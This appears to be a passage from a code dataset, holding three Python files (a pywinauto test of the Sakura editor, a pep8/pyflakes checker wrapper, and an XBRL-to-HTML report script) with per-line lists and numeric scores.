0.03225806451612903, 0.058823529411764705, 0, 0.02702702702702703, 0.02666666666666667, 0.025974025974025976, 0.02666666666666667, 0, 0.029411764705882353, 0.02631578947368421, 0.027777777777777776, 0.016129032258064516, 0.020833333333333332, 0, 0.03225806451612903, 0.03571428571428571, 0, 0.02702702702702703, 0.021739130434782608, 0.02, 0.038461538461538464, 0, 0.03125, 0.03225806451612903, 0.038461538461538464, 0, 0.029411764705882353, 0.05714285714285714, 0.03333333333333333, 0, 0.029411764705882353, 0.05714285714285714, 0.03333333333333333, 0, 0, 0.10526315789473684, 0.14285714285714285, 0, 0.058823529411764705, 0.023255813953488372, 0.02040816326530612, 0.0125 ]
125
0.025691
false
# -*- coding: UTF-8 -*- # GUI Application automation and testing library # Copyright (C) 2006 Mark Mc Mahon # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public License # as published by the Free Software Foundation; either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., # 59 Temple Place, # Suite 330, # Boston, MA 02111-1307 USA import time from pywinauto import application from pywinauto import tests def SakuraTest(): app = application.Application() app.start_(ur"\Program Files\sakura\sakura.exe") mainwin = app.window_(title_re = u'\(無題\) - sakura .*') # menu's from this application are not recovered well # but even with Japanese Regional settings they are not # rendered correctly by windows! # so using keys to select a menu item # open some dialog mainwin.TypeKeys("%OC") dlg = app.window_(title = u'共通設定') dlg.window_(title_re = ur"フリーカーソル.*").Click() dlg.MSDOS.Click() dlg.Cancel.Click() # quit the application mainwin.TypeKeys("%FX") def Main(): start = time.time() SakuraTest() print "Total time taken:", time.time() - start if __name__ == "__main__": Main()
[ "# -*- coding: UTF-8 -*-\r\n", "# GUI Application automation and testing library\r\n", "# Copyright (C) 2006 Mark Mc Mahon\r\n", "#\r\n", "# This library is free software; you can redistribute it and/or \r\n", "# modify it under the terms of the GNU Lesser General Public License \r\n", "# as published by the Free Software Foundation; either version 2.1 \r\n", "# of the License, or (at your option) any later version.\r\n", "#\r\n", "# This library is distributed in the hope that it will be useful, \r\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of \r\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. \r\n", "# See the GNU Lesser General Public License for more details.\r\n", "#\r\n", "# You should have received a copy of the GNU Lesser General Public \r\n", "# License along with this library; if not, write to the \r\n", "# Free Software Foundation, Inc.,\r\n", "# 59 Temple Place,\r\n", "# Suite 330, \r\n", "# Boston, MA 02111-1307 USA \r\n", "\r\n", "import time\r\n", "\r\n", "from pywinauto import application\r\n", "\r\n", "from pywinauto import tests\r\n", "\r\n", "\r\n", "def SakuraTest():\r\n", "\r\n", "\tapp = application.Application()\r\n", "\tapp.start_(ur\"\\Program Files\\sakura\\sakura.exe\")\r\n", "\t\r\n", "\tmainwin = app.window_(title_re = u'\\(無題\\) - sakura .*')\r\n", "\r\n", "\t# menu's from this application are not recovered well\r\n", "\t# but even with Japanese Regional settings they are not\r\n", "\t# rendered correctly by windows!\r\n", "\t# so using keys to select a menu item\r\n", "\r\n", "\t# open some dialog\r\n", "\tmainwin.TypeKeys(\"%OC\")\r\n", "\r\n", "\tdlg = app.window_(title = u'共通設定')\r\n", "\tdlg.window_(title_re = ur\"フリーカーソル.*\").Click()\r\n", "\tdlg.MSDOS.Click()\r\n", "\tdlg.Cancel.Click()\r\n", "\r\n", "\t# quit the application\r\n", "\tmainwin.TypeKeys(\"%FX\")\r\n", "\t\t\r\n", "\r\n", "\t\r\n", "def Main():\r\n", "\tstart = time.time()\r\n", "\t\r\n", "\tSakuraTest()\t\r\n", "\t\r\n", 
"\tprint \"Total time taken:\", time.time() - start\r\n", "\r\n", "if __name__ == \"__main__\":\r\n", "\tMain()" ]
[ 0, 0, 0, 0, 0.015151515151515152, 0.014084507042253521, 0.014492753623188406, 0, 0, 0.014705882352941176, 0.014925373134328358, 0.017543859649122806, 0, 0, 0.014492753623188406, 0.017241379310344827, 0, 0, 0.05555555555555555, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0.0784313725490196, 0.6666666666666666, 0.08620689655172414, 0, 0.017857142857142856, 0.017241379310344827, 0.02857142857142857, 0.025, 0, 0.047619047619047616, 0.038461538461538464, 0, 0.08108108108108109, 0.0625, 0.05, 0.047619047619047616, 0, 0.04, 0.038461538461538464, 0.5, 0, 0.6666666666666666, 0.07692307692307693, 0.045454545454545456, 0.6666666666666666, 0.125, 0.6666666666666666, 0.02040816326530612, 0, 0.03571428571428571, 0.2857142857142857 ]
62
0.075046
false
#!/usr/bin/env python # coding:utf-8 "Integration of several python code checkers" __author__ = "Mariano Reingart (reingart@gmail.com)" __copyright__ = "Copyright (C) 2011 Mariano Reingart" __license__ = "GPL 3.0" import os import compiler import _ast import pep8 import pyflakes.checker # PEP8 Coding Standar class PEP8(pep8.Checker): def __init__(self, filename, lines=None): self.errors = [] pep8style = pep8.StyleGuide(parse_argv=False, config_file=False) options = pep8style.options options.prog = os.path.basename(filename) options.exclude = [] options.filename = filename options.select = [] options.ignore = [] options.verbose = 0 #options.ignore = pep8.DEFAULT_IGNORE.split(',') options.counters = {'physical lines': 0, 'logical lines': 0,} options.messages = {} pep8.Checker.__init__(self, filename) self.check_all() def report_error(self, line_number, offset, text, check): filename = self.filename error = dict(summary=text, type=30, filename=filename, lineno=line_number, offset=offset+1) self.errors.append(error) def __iter__(self): for error in self.errors: yield error # PyFlakes Sanity Checks class PyFlakes(object): def __init__(self, filename): code_string = open(filename).read() tree = compile(code_string, filename, "exec", _ast.PyCF_ONLY_AST) self.checker = pyflakes.checker.Checker(tree, filename) self.checker.messages.sort(lambda a, b: cmp(a.lineno, b.lineno)) def __iter__(self): for msg in self.checker.messages: filename = msg.filename text = msg.message % msg.message_args lineno = msg.lineno error = dict(summary=text, type=40, filename=filename, lineno=lineno, offset=1) yield error def check(filename): "Try all available checkers and return all defects founds" for defect in PEP8(filename): yield defect for defect in PyFlakes(filename): yield defect if __name__ == '__main__': for e in check("hola.py"): print e
[ "#!/usr/bin/env python\r\n", "# coding:utf-8\r\n", "\r\n", "\"Integration of several python code checkers\"\r\n", "\r\n", "__author__ = \"Mariano Reingart (reingart@gmail.com)\"\r\n", "__copyright__ = \"Copyright (C) 2011 Mariano Reingart\"\r\n", "__license__ = \"GPL 3.0\"\r\n", "\r\n", "import os\r\n", "import compiler\r\n", "import _ast\r\n", "\r\n", "import pep8\r\n", "import pyflakes.checker\r\n", "\r\n", "\r\n", "# PEP8 Coding Standar\r\n", "\r\n", "class PEP8(pep8.Checker):\r\n", " def __init__(self, filename, lines=None):\r\n", " self.errors = []\r\n", " pep8style = pep8.StyleGuide(parse_argv=False, config_file=False)\r\n", " options = pep8style.options\r\n", " options.prog = os.path.basename(filename)\r\n", " options.exclude = []\r\n", " options.filename = filename\r\n", " options.select = []\r\n", " options.ignore = []\r\n", " options.verbose = 0\r\n", " #options.ignore = pep8.DEFAULT_IGNORE.split(',')\r\n", " options.counters = {'physical lines': 0, 'logical lines': 0,}\r\n", " options.messages = {}\r\n", " pep8.Checker.__init__(self, filename)\r\n", " self.check_all()\r\n", "\r\n", " def report_error(self, line_number, offset, text, check):\r\n", " filename = self.filename\r\n", " error = dict(summary=text, type=30, \r\n", " filename=filename, lineno=line_number, offset=offset+1)\r\n", " self.errors.append(error)\r\n", " \r\n", " def __iter__(self):\r\n", " for error in self.errors:\r\n", " yield error\r\n", "\r\n", "\r\n", "# PyFlakes Sanity Checks\r\n", "\r\n", "class PyFlakes(object):\r\n", "\r\n", " def __init__(self, filename):\r\n", " code_string = open(filename).read()\r\n", " tree = compile(code_string, filename, \"exec\", _ast.PyCF_ONLY_AST)\r\n", " self.checker = pyflakes.checker.Checker(tree, filename)\r\n", " self.checker.messages.sort(lambda a, b: cmp(a.lineno, b.lineno))\r\n", "\r\n", " def __iter__(self):\r\n", " for msg in self.checker.messages:\r\n", " filename = msg.filename\r\n", " text = msg.message % msg.message_args\r\n", " lineno 
= msg.lineno\r\n", " error = dict(summary=text, type=40, \r\n", " filename=filename, lineno=lineno, offset=1)\r\n", " yield error\r\n", "\r\n", "\r\n", "\r\n", "def check(filename):\r\n", " \"Try all available checkers and return all defects founds\"\r\n", " for defect in PEP8(filename):\r\n", " yield defect\r\n", " for defect in PyFlakes(filename):\r\n", " yield defect\r\n", " \r\n", " \r\n", "if __name__ == '__main__':\r\n", " for e in check(\"hola.py\"):\r\n", " print e\r\n", "\r\n", " \r\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.017241379310344827, 0.014084507042253521, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0.1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0.16666666666666666, 0.1, 0, 0, 0, 0, 0.16666666666666666 ]
81
0.008048
false
# Copyright 2015 Altova GmbH # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. __copyright__ = "Copyright 2015-2017 Altova GmbH" __license__ = 'http://www.apache.org/licenses/LICENSE-2.0' # This script generates HTML reports from a SEC EDGAR filing. # # Example invocation: # raptorxmlxbrl valxbrl --script=sec_filing_to_html.py nanonull.xbrl import os, datetime, itertools, builtins from altova import * lang='en-US' def isPeriodStart(role): return role in ( 'http://www.xbrl.org/2003/role/periodStartLabel', 'http://xbrl.us/us-gaap/role/label/negatedPeriodStart', 'http://www.xbrl.org/2009/role/negatedPeriodStartLabel' ) def isPeriodEnd(role): return role in ( 'http://www.xbrl.org/2003/role/periodEndLabel', 'http://xbrl.us/us-gaap/role/label/negatedPeriodEnd', 'http://www.xbrl.org/2009/role/negatedPeriodEndLabel' ) def isTotal(role): return role in ( 'http://www.xbrl.org/2003/role/totalLabel', 'http://xbrl.us/us-gaap/role/label/negatedTotal', 'http://www.xbrl.org/2009/role/negatedTotalLabel' ) def isNegated(role): return role in ( 'http://xbrl.us/us-gaap/role/label/negated', 'http://www.xbrl.org/2009/role/negatedLabel', 'http://www.xbrl.org/2009/role/negatedNetLabel', 'http://xbrl.us/us-gaap/role/label/negatedPeriodEnd', 'http://www.xbrl.org/2009/role/negatedPeriodEndLabel', 'http://xbrl.us/us-gaap/role/label/negatedPeriodStart', 'http://www.xbrl.org/2009/role/negatedPeriodStartLabel', 'http://www.xbrl.org/2009/role/negatedTerseLabel', 'http://xbrl.us/us-gaap/role/label/negatedTotal', 
'http://www.xbrl.org/2009/role/negatedTotalLabel' ) def domainMembersFromPresentationTreeRecursive(network,parent,domain_members): for rel in network.relationships_from(parent): domain_members.append(rel.target) domainMembersFromPresentationTreeRecursive(network,rel.target,domain_members) def conceptsFromPresentationTreeRecursive(network,parent,concepts): for rel in network.relationships_from(parent): if not rel.target.abstract: concepts.append((rel.target,rel.preferred_label)) conceptsFromPresentationTreeRecursive(network,rel.target,concepts) def analyzePresentationTree(network,roots): concepts = [] dimensions = {} for rel in network.relationships_from(roots[0]): if isinstance(rel.target,xbrl.xdt.Hypercube): for rel2 in network.relationships_from(rel.target): if isinstance(rel2.target,xbrl.xdt.Dimension): domainMembersFromPresentationTreeRecursive(network,rel2.target,dimensions.setdefault(rel2.target,[])) else: conceptsFromPresentationTreeRecursive(network,rel2.target,concepts) else: conceptsFromPresentationTreeRecursive(network,rel.target,concepts) return concepts, dimensions def calcTableData(instance,role,contexts,concepts,dimensions): table = {'columns': [], 'height': len(concepts)} bIsCashFlow = 'cash' in role[1].lower() and 'flow' in role[1].lower() for context in contexts: cs = xbrl.ConstraintSet(context) period = cs[xbrl.Aspect.PERIOD] dimension_aspects = [value for aspect,value in cs.items() if isinstance(aspect,xbrl.xdt.Dimension)] bEliminate = False for val in dimension_aspects: domain = dimensions.get(val.dimension,None) if not domain or val.value not in domain: bEliminate = True for dim in set(dimensions.keys())-set([value.dimension for value in dimension_aspects]): if dim.default_member and dim.default_member not in dimensions[dim]: bEliminate = True if bEliminate: continue bEmpty = True bHasCash = False column = {'period': period, 'dimensions': dimension_aspects, 'rows': []} for concept in concepts: cs[xbrl.Aspect.CONCEPT] = concept[0] if 
isPeriodStart(concept[1]): if period.period_type == xbrl.PeriodType.START_END: cs[xbrl.Aspect.PERIOD] = xbrl.PeriodAspectValue.from_instant(period.start) else: column['rows'].append({'concept': concept, 'facts': xbrl.FactSet()}) continue elif isPeriodEnd(concept[1]): if period.period_type == xbrl.PeriodType.START_END: cs[xbrl.Aspect.PERIOD] = xbrl.PeriodAspectValue.from_instant(period.end) else: column['rows'].append({'concept': concept, 'facts': xbrl.FactSet()}) continue else: cs[xbrl.Aspect.PERIOD] = period facts = instance.facts.filter(cs,allow_additional_dimensions=False) if len(facts): bEmpty = False if bIsCashFlow and not bHasCash and concept[0].is_duration(): bHasCash = 'cash' in next(iter(concept[0].labels(label_role=concept[1],lang=lang))).text.lower() column['rows'].append({'concept': concept, 'facts': facts}) if not bEmpty and (not bIsCashFlow or bHasCash): table['columns'].append(column) return table def formatConcept(concept): preferredLabel = concept[1] if concept[1] else 'http://www.xbrl.org/2003/role/label' labels = list(concept[0].labels(label_role=preferredLabel,lang=lang)) if labels: return labels[0].text return str(concept[0].qname) def formatUnit(unit): numerators = list(unit.numerator_measures) denumerators = list(unit.denominator_measures) if len(numerators) == 1 and len(denumerators) == 0: if numerators[0] == xml.QName('USD','http://www.xbrl.org/2003/iso4217'): return '$' elif numerators[0] == xml.QName('EUR','http://www.xbrl.org/2003/iso4217'): return '€' numerator = ','.join([qname.local_name for qname in numerators]) denominator = ','.join([qname.local_name for qname in denominators]) if denominator: return numerator+'/'+denominator return numerator def formatDimensionValue(dimValue): return formatConcept((dimValue.value,'http://www.xbrl.org/2003/role/terseLabel')) def formatFact(fact,preferredLabel): if fact.xsi_nil: return 'nil' elif fact.concept.is_numeric(): val = fact.effective_numeric_value if preferredLabel and 'negated' in 
preferredLabel: val *= -1 if val < 0: return '(%s)' % str(abs(val)) return str(val) elif fact.concept.is_fraction(): return str(fact.fraction_value) else: return fact.normalized_value def formatDate(date): return date.strftime('%b. %d, %Y') def getDuration(column): p = column['period'] if p.period_type == xbrl.PeriodType.INSTANT: return 0 return (p.end.year - p.start.year) * 12 + p.end.month - p.start.month def getEndDate(column): p = column['period'] if p.period_type == xbrl.PeriodType.INSTANT: return p.instant return p.end def generateTable(file, role, table): columns = sorted(table['columns'],key=lambda x: (-getDuration(x),getEndDate(x)),reverse=True) file.write('<hr/>\n') file.write('<a name="table_%s"/>\n' % role[1].split(' - ')[0]) file.write('<table>\n') file.write('<caption>') file.write(role[1]) file.write('</caption>\n') file.write('<thead>\n') bHasDurations = False for duration, group in itertools.groupby(columns,key=getDuration): if duration > 0: bHasDurations = True file.write('<tr>\n') file.write('<th rowspan="%d"></th>\n' % (2 if bHasDurations else 1)) if bHasDurations: for duration, group in itertools.groupby(columns,key=getDuration): cols = list(group) file.write('<th colspan="%d">\n' % len(cols)) if duration > 0: file.write('<p class="label">%d Months Ended</p>\n' % getDuration(cols[0])) file.write('</th>\n') file.write('</tr>\n') file.write('<tr>\n') for column in columns: file.write('<th>\n') file.write('<p class="label">%s</p>\n' % formatDate(getEndDate(column)-datetime.timedelta(days=1))) for dimValue in column['dimensions']: dimLabel = formatDimensionValue(dimValue) if '[Domain]' not in dimLabel: file.write('<p class="label">%s</p>\n' % dimLabel) file.write('</th>\n') file.write('</tr>\n') file.write('</thead>\n') file.write('<tbody>\n') footnotes = {} for row in range(table['height']): concept = columns[0]['rows'][row]['concept'] file.write('<tr>\n') file.write('<th>%s</th>\n' % formatConcept(concept)) for column in columns: 
file.write('<td>') for fact in column['rows'][row]['facts']: file.write('<p class="fact">%s' % formatFact(fact,concept[1])) for footnote in fact.footnotes(lang=lang): index = footnotes.setdefault(footnote, len(footnotes)+1) file.write('<a href="#table_%s_footnote_%d"><span class="footnoteRef">[%d]</span></a>' % (role[1].split(' - ')[0],index,index)) file.write('</p>\n') file.write('</td>\n') file.write('</tr>\n') file.write('</tbody>\n') file.write('</table>\n') for (footnote,index) in sorted(footnotes.items(),key=lambda footnote: footnote[1]): file.write('<a name="table_%s_footnote_%d"><p class="footnote">[%d] %s</p></a>\n' % (role[1].split(' - ')[0],index,index,footnote.text)) def generateTables(file, dts, instance): file.write("""<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8"/> <style type="text/css"> .error { color: red } .footnoteRef { font-size: 70%; vertical-align: top;} table { border-collapse:collapse; border: 0.22em solid black; background-color: white; color: black;} caption {font-size: 150%} td, th { border-left: 0.1em solid black; border-left: 0.1em solid black; border-top: 0.1em solid black; padding: 0.5em; text-align: center; } thead tr th.rollup { border-top-style: none; } tbody tr th.rollup { border-left-style: none; } tbody tr:nth-of-type(even) { background-color: #EAEFFF; } thead, tbody tr th { background-color: #C6D8FF; } thead { border-bottom: 0.19em solid black; } thead tr:first-of-type th:first-of-type, tbody tr th:last-of-type { border-right: 0.18em solid black; } </style> </head> <body> """) # Calculate table data tables = {} contexts = list(instance.contexts) roles = [(role, dts.role_type(role).definition.value) for role in dts.presentation_link_roles()] roles = sorted(roles, key=lambda role: role[1].split(' - ')[0]) for role in roles: presentation_network = dts.presentation_base_set(role[0]).network_of_relationships() roots = list(presentation_network.roots) 
tables[role] = calcTableData(instance,role,contexts,*analyzePresentationTree(presentation_network,roots)) # Generate table index for role in roles: if tables[role]['columns']: file.write('<h4><a href="#table_%s">%s</a></h4>\n' % (role[1].split(' - ')[0], role[1])) # Generate html rendering of each non-empty table for role in roles: if tables[role]['columns']: generateTable(file, role, tables[role]) # Main entry point, will be called by RaptorXML after the XBRL instance validation job has finished def on_xbrl_finished(job, instance): # instance object will be None if XBRL 2.1 validation was not successful if instance: path = os.path.join(job.output_dir,'table.html') with builtins.open(path,mode='w',newline='') as file: generateTables(file, instance.dts, instance) # Register new output file with RaptorXML engine job.append_output_filename(path)
[ "# Copyright 2015 Altova GmbH\n", "# \n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at\n", "# \n", "# http://www.apache.org/licenses/LICENSE-2.0\n", "# \n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "__copyright__ = \"Copyright 2015-2017 Altova GmbH\"\n", "__license__ = 'http://www.apache.org/licenses/LICENSE-2.0'\n", "\n", "# This script generates HTML reports from a SEC EDGAR filing.\n", "#\n", "# Example invocation:\n", "# raptorxmlxbrl valxbrl --script=sec_filing_to_html.py nanonull.xbrl\n", "\n", "import os, datetime, itertools, builtins\n", "from altova import *\n", "\n", "lang='en-US'\n", "\n", "def isPeriodStart(role):\n", " return role in (\n", " 'http://www.xbrl.org/2003/role/periodStartLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedPeriodStart',\n", " 'http://www.xbrl.org/2009/role/negatedPeriodStartLabel'\n", " )\n", "def isPeriodEnd(role):\n", " return role in (\n", " 'http://www.xbrl.org/2003/role/periodEndLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedPeriodEnd',\n", " 'http://www.xbrl.org/2009/role/negatedPeriodEndLabel'\n", " )\n", "def isTotal(role):\n", " return role in (\n", " 'http://www.xbrl.org/2003/role/totalLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedTotal',\n", " 'http://www.xbrl.org/2009/role/negatedTotalLabel'\n", " )\n", "def isNegated(role):\n", " return role in (\n", " 'http://xbrl.us/us-gaap/role/label/negated',\n", " 'http://www.xbrl.org/2009/role/negatedLabel',\n", " 'http://www.xbrl.org/2009/role/negatedNetLabel',\n", " 
'http://xbrl.us/us-gaap/role/label/negatedPeriodEnd',\n", " 'http://www.xbrl.org/2009/role/negatedPeriodEndLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedPeriodStart',\n", " 'http://www.xbrl.org/2009/role/negatedPeriodStartLabel',\n", " 'http://www.xbrl.org/2009/role/negatedTerseLabel',\n", " 'http://xbrl.us/us-gaap/role/label/negatedTotal',\n", " 'http://www.xbrl.org/2009/role/negatedTotalLabel'\n", " )\n", " \n", "def domainMembersFromPresentationTreeRecursive(network,parent,domain_members):\n", " for rel in network.relationships_from(parent):\n", " domain_members.append(rel.target)\n", " domainMembersFromPresentationTreeRecursive(network,rel.target,domain_members)\n", " \n", "def conceptsFromPresentationTreeRecursive(network,parent,concepts):\n", " for rel in network.relationships_from(parent):\n", " if not rel.target.abstract:\n", " concepts.append((rel.target,rel.preferred_label))\n", " conceptsFromPresentationTreeRecursive(network,rel.target,concepts)\n", "\n", "def analyzePresentationTree(network,roots):\n", " concepts = []\n", " dimensions = {}\n", " for rel in network.relationships_from(roots[0]):\n", " if isinstance(rel.target,xbrl.xdt.Hypercube):\n", " for rel2 in network.relationships_from(rel.target):\n", " if isinstance(rel2.target,xbrl.xdt.Dimension):\n", " domainMembersFromPresentationTreeRecursive(network,rel2.target,dimensions.setdefault(rel2.target,[])) \n", " else:\n", " conceptsFromPresentationTreeRecursive(network,rel2.target,concepts)\n", " else:\n", " conceptsFromPresentationTreeRecursive(network,rel.target,concepts)\n", " return concepts, dimensions\n", "\n", "def calcTableData(instance,role,contexts,concepts,dimensions):\n", " table = {'columns': [], 'height': len(concepts)}\n", "\n", " bIsCashFlow = 'cash' in role[1].lower() and 'flow' in role[1].lower()\n", " \n", " for context in contexts:\n", " cs = xbrl.ConstraintSet(context)\n", " period = cs[xbrl.Aspect.PERIOD]\n", " dimension_aspects = [value for aspect,value in cs.items() 
if isinstance(aspect,xbrl.xdt.Dimension)]\n", " bEliminate = False\n", " for val in dimension_aspects:\n", " domain = dimensions.get(val.dimension,None)\n", " if not domain or val.value not in domain:\n", " bEliminate = True\n", " for dim in set(dimensions.keys())-set([value.dimension for value in dimension_aspects]):\n", " if dim.default_member and dim.default_member not in dimensions[dim]:\n", " bEliminate = True\n", " if bEliminate:\n", " continue \n", " \n", " bEmpty = True\n", " bHasCash = False\n", " column = {'period': period, 'dimensions': dimension_aspects, 'rows': []} \n", " for concept in concepts:\n", " cs[xbrl.Aspect.CONCEPT] = concept[0]\n", " if isPeriodStart(concept[1]):\n", " if period.period_type == xbrl.PeriodType.START_END:\n", " cs[xbrl.Aspect.PERIOD] = xbrl.PeriodAspectValue.from_instant(period.start)\n", " else:\n", " column['rows'].append({'concept': concept, 'facts': xbrl.FactSet()})\n", " continue\n", " elif isPeriodEnd(concept[1]):\n", " if period.period_type == xbrl.PeriodType.START_END:\n", " cs[xbrl.Aspect.PERIOD] = xbrl.PeriodAspectValue.from_instant(period.end)\n", " else:\n", " column['rows'].append({'concept': concept, 'facts': xbrl.FactSet()})\n", " continue\n", " else:\n", " cs[xbrl.Aspect.PERIOD] = period\n", " \n", " facts = instance.facts.filter(cs,allow_additional_dimensions=False)\n", " if len(facts):\n", " bEmpty = False\n", " if bIsCashFlow and not bHasCash and concept[0].is_duration():\n", " bHasCash = 'cash' in next(iter(concept[0].labels(label_role=concept[1],lang=lang))).text.lower()\n", " column['rows'].append({'concept': concept, 'facts': facts})\n", "\n", " if not bEmpty and (not bIsCashFlow or bHasCash):\n", " table['columns'].append(column)\n", " \n", " return table\n", "\n", "def formatConcept(concept):\n", " preferredLabel = concept[1] if concept[1] else 'http://www.xbrl.org/2003/role/label'\n", " labels = list(concept[0].labels(label_role=preferredLabel,lang=lang))\n", " if labels:\n", " return 
labels[0].text\n", " return str(concept[0].qname)\n", "\n", "def formatUnit(unit):\n", " numerators = list(unit.numerator_measures)\n", " denumerators = list(unit.denominator_measures)\n", " if len(numerators) == 1 and len(denumerators) == 0:\n", " if numerators[0] == xml.QName('USD','http://www.xbrl.org/2003/iso4217'):\n", " return '$'\n", " elif numerators[0] == xml.QName('EUR','http://www.xbrl.org/2003/iso4217'):\n", " return '€'\n", " numerator = ','.join([qname.local_name for qname in numerators])\n", " denominator = ','.join([qname.local_name for qname in denominators])\n", " if denominator:\n", " return numerator+'/'+denominator\n", " return numerator\n", " \n", "def formatDimensionValue(dimValue):\n", " return formatConcept((dimValue.value,'http://www.xbrl.org/2003/role/terseLabel'))\n", " \n", "def formatFact(fact,preferredLabel):\n", " if fact.xsi_nil:\n", " return 'nil'\n", " elif fact.concept.is_numeric():\n", " val = fact.effective_numeric_value\n", " if preferredLabel and 'negated' in preferredLabel:\n", " val *= -1\n", " if val < 0:\n", " return '(%s)' % str(abs(val))\n", " return str(val)\n", " elif fact.concept.is_fraction():\n", " return str(fact.fraction_value)\n", " else:\n", " return fact.normalized_value\n", "\n", "def formatDate(date):\n", " return date.strftime('%b. 
%d, %Y')\n", " \n", "def getDuration(column):\n", " p = column['period']\n", " if p.period_type == xbrl.PeriodType.INSTANT:\n", " return 0\n", " return (p.end.year - p.start.year) * 12 + p.end.month - p.start.month\n", "\n", "def getEndDate(column):\n", " p = column['period']\n", " if p.period_type == xbrl.PeriodType.INSTANT:\n", " return p.instant\n", " return p.end\n", " \n", "def generateTable(file, role, table):\n", " columns = sorted(table['columns'],key=lambda x: (-getDuration(x),getEndDate(x)),reverse=True)\n", " \n", " file.write('<hr/>\\n')\n", " file.write('<a name=\"table_%s\"/>\\n' % role[1].split(' - ')[0])\n", " file.write('<table>\\n')\n", "\n", " file.write('<caption>')\n", " file.write(role[1])\n", " file.write('</caption>\\n')\n", " \n", " file.write('<thead>\\n')\n", "\n", " bHasDurations = False\n", " for duration, group in itertools.groupby(columns,key=getDuration):\n", " if duration > 0:\n", " bHasDurations = True \n", " \n", " file.write('<tr>\\n')\n", " file.write('<th rowspan=\"%d\"></th>\\n' % (2 if bHasDurations else 1))\n", " if bHasDurations:\n", " for duration, group in itertools.groupby(columns,key=getDuration):\n", " cols = list(group)\n", " file.write('<th colspan=\"%d\">\\n' % len(cols))\n", " if duration > 0:\n", " file.write('<p class=\"label\">%d Months Ended</p>\\n' % getDuration(cols[0]))\n", " file.write('</th>\\n')\n", " file.write('</tr>\\n') \n", " file.write('<tr>\\n')\n", " for column in columns:\n", " file.write('<th>\\n')\n", " file.write('<p class=\"label\">%s</p>\\n' % formatDate(getEndDate(column)-datetime.timedelta(days=1)))\n", " for dimValue in column['dimensions']:\n", " dimLabel = formatDimensionValue(dimValue)\n", " if '[Domain]' not in dimLabel:\n", " file.write('<p class=\"label\">%s</p>\\n' % dimLabel)\n", " file.write('</th>\\n')\n", " file.write('</tr>\\n')\n", " file.write('</thead>\\n')\n", "\n", " file.write('<tbody>\\n')\n", " footnotes = {}\n", " for row in range(table['height']):\n", " concept = 
columns[0]['rows'][row]['concept']\n", " file.write('<tr>\\n')\n", " file.write('<th>%s</th>\\n' % formatConcept(concept))\n", " for column in columns:\n", " file.write('<td>')\n", " for fact in column['rows'][row]['facts']:\n", " file.write('<p class=\"fact\">%s' % formatFact(fact,concept[1]))\n", " for footnote in fact.footnotes(lang=lang):\n", " index = footnotes.setdefault(footnote, len(footnotes)+1)\n", " file.write('<a href=\"#table_%s_footnote_%d\"><span class=\"footnoteRef\">[%d]</span></a>' % (role[1].split(' - ')[0],index,index))\n", " file.write('</p>\\n')\n", " file.write('</td>\\n')\n", " file.write('</tr>\\n')\n", " file.write('</tbody>\\n')\n", " \n", " file.write('</table>\\n')\n", " \n", " for (footnote,index) in sorted(footnotes.items(),key=lambda footnote: footnote[1]):\n", " file.write('<a name=\"table_%s_footnote_%d\"><p class=\"footnote\">[%d] %s</p></a>\\n' % (role[1].split(' - ')[0],index,index,footnote.text))\n", " \n", "def generateTables(file, dts, instance):\n", " file.write(\"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n", "<!DOCTYPE html>\n", "<html xmlns=\"http://www.w3.org/1999/xhtml\">\n", "<head>\n", "<meta charset=\"utf-8\"/>\n", "<style type=\"text/css\">\n", ".error { color: red }\n", ".footnoteRef { font-size: 70%; vertical-align: top;}\n", "table { border-collapse:collapse; border: 0.22em solid black; background-color: white; color: black;} \n", "caption {font-size: 150%}\n", "td, th { border-left: 0.1em solid black; border-left: 0.1em solid black; border-top: 0.1em solid black; padding: 0.5em; text-align: center; } \n", "thead tr th.rollup { border-top-style: none; } \n", "tbody tr th.rollup { border-left-style: none; } \n", "tbody tr:nth-of-type(even) { background-color: #EAEFFF; } \n", "thead, tbody tr th { background-color: #C6D8FF; } \n", "thead { border-bottom: 0.19em solid black; } \n", "thead tr:first-of-type th:first-of-type, tbody tr th:last-of-type { border-right: 0.18em solid black; } \n", "</style>\n", 
